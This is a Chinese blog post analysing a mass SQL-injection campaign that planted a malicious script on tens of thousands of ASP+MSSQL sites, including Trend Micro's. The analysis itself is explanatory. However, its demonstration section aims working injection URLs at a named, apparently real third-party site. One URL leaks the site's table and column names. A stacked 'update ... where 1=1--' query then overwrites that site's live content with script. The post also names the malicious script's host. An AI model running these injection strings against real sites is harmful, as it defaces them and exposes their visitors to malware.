对趋势科技等数万网站被攻击的分析
BY: rayh4c.cn
一. 首先在网上找到了这次攻击的新闻报道
http://www.nsfocus.net/news/6697
http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html
通过GOOGLE搜索到了相关被黑的页面
趋势科技的页面被插入过http://www.2117966.net/fuckjp.js相关的JS挂马。
二. 直接查找这个JS相关的信息
http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=www.2117966.net+fuckjp.js&meta=&aq=f
发现了12,500项符合的结果,这些返回的结果信息都是当前页面被插入了JS挂马。
通过分析发现被黑的页面都有如下特征:
1.被修改页面的网站都是ASP+MSSQL的架构。
2.被修改的页面都存在SQL注入漏洞。
三. 取了其中一个被挂马页面做了SQL注入挂马的模拟攻击:
1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162
这个链接存在明显的SQL注入,对person参数注入语句having 1=1,将暴出当前页面注入点的表名为coordinator,字段名
ShCoordinatorSurame。
http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162
having 1=1
------------------
Microsoft OLE DB Provider for ODBC Drivers error 80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
coordinator.ShCoordinatorSurame is invalid in the select list
because it is not contained in an aggregate function and there is no
GROUP BY clause.
/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp, line 20
-------------------
2. 修改暴出的当前页面的表名,字段名内容为插入JS的代码来实现挂马
http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162;update
coordinator set ShCoordinatorSurame=<xss> where 1=1--
修改coordinator 表 ShCoordinatorSurame 字段内容为<xss>,同时设一个1=1为真的逻辑条件就可以修改当前页面
查询数据的内容.
就可以实现在有SQL注入点的页面直接挂马。
四.总结.
这次大规模攻击的流程应该是自动化的:
1.通过先进的扫描技术批量收集到几万网站的SQL注入漏洞。
2.针对漏洞攻击,进行自动化的SQL注入挂马。
现今虽然SQL注入漏洞已经很老了,但是这次黑客在一天内同时对数万网站攻击挂马的技术却是很惊人的,连趋势这样的安全公司也未能幸免。
- 上一篇:当无法使用ESP定律时——EBP的妙用
- 下一篇:五个顶级Linux安全工具
- 文章
- 推荐
- 热门新闻